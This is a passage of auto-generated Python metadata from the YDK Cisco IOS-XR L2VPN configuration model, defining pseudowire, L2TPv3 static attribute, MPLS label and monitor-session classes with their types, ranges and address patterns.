'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv4 address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-mpls-static-labels', REFERENCE_CLASS, 'BackupMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'backup_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for the
backup PW
''',
'backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
False,
[
_MetaInfoClassMember('backup-pseudowire', REFERENCE_LIST, 'BackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire',
[], [],
''' Backup pseudowire for the cross connect
''',
'backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher remote cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower remote cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Remote cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-remote-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-secondary-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
False,
[
_MetaInfoClassMember('higher-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Higher local cookie value
''',
'higher_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('lower-value', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Lower local cookie value
''',
'lower_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Local cookie size
''',
'size',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-local-cookie',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
False,
[
_MetaInfoClassMember('l2tp-local-cookie', REFERENCE_CLASS, 'L2TpLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie',
[], [],
''' L2TP local cookie
''',
'l2tp_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-local-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP local session ID
''',
'l2tp_local_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-cookie', REFERENCE_CLASS, 'L2TpRemoteCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie',
[], [],
''' L2TP remote cookie
''',
'l2tp_remote_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-remote-session-id', ATTRIBUTE, 'int' , None, None,
[('1', '65535')], [],
''' L2TP remote session ID
''',
'l2tp_remote_session_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-secondary-local-cookie', REFERENCE_CLASS, 'L2TpSecondaryLocalCookie' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie',
[], [],
''' L2TP secondary local cookie
''',
'l2tp_secondary_local_cookie',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static-attributes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire L2TPv3 static
configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tp-static',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
False,
[
_MetaInfoClassMember('pseudowire-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Pseudowire IPv6 address. A pseudowire
can have only one address: IPv4 or IPv6
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-pseudowires', REFERENCE_CLASS, 'BackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires',
[], [],
''' List of pseudowires
''',
'backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bandwidth', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Pseudowire Bandwidth
''',
'bandwidth',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static', REFERENCE_CLASS, 'L2TpStatic' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic',
[], [],
''' Pseudowire L2TPv3 static configuration
''',
'l2tp_static',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tp-static-attributes', REFERENCE_CLASS, 'L2TpStaticAttributes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes',
[], [],
''' L2TP Static Attributes
''',
'l2tp_static_attributes',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-static-labels', REFERENCE_CLASS, 'MplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels',
[], [],
''' MPLS static labels
''',
'mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', REFERENCE_UNION, 'str' , None, None,
[], [],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False, [
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'],
''' Value of the Pseudowire source address.
Must be IPv6 only.
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
]),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
False,
[
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('neighbor', REFERENCE_LIST, 'Neighbor' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor',
[], [],
''' keys: neighbor
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-address', REFERENCE_LIST, 'PseudowireAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress',
[], [],
''' keys: pseudowire-address
''',
'pseudowire_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires',
False,
[
_MetaInfoClassMember('pseudowire', REFERENCE_LIST, 'Pseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire',
[], [],
''' Pseudowire configuration
''',
'pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Name of the monitor session
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable monitor session segment
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-session',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions',
False,
[
_MetaInfoClassMember('monitor-session', REFERENCE_LIST, 'MonitorSession' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession',
[], [],
''' Monitor session segment
''',
'monitor_session',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'monitor-sessions',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Target Global ID
''',
'global_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('prefix', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Target Prefix
''',
'prefix',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('sacid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Source AC ID
''',
'sacid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'class_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('tag-impose', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Tag Impose vlan tagged mode
''',
'tag_impose',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
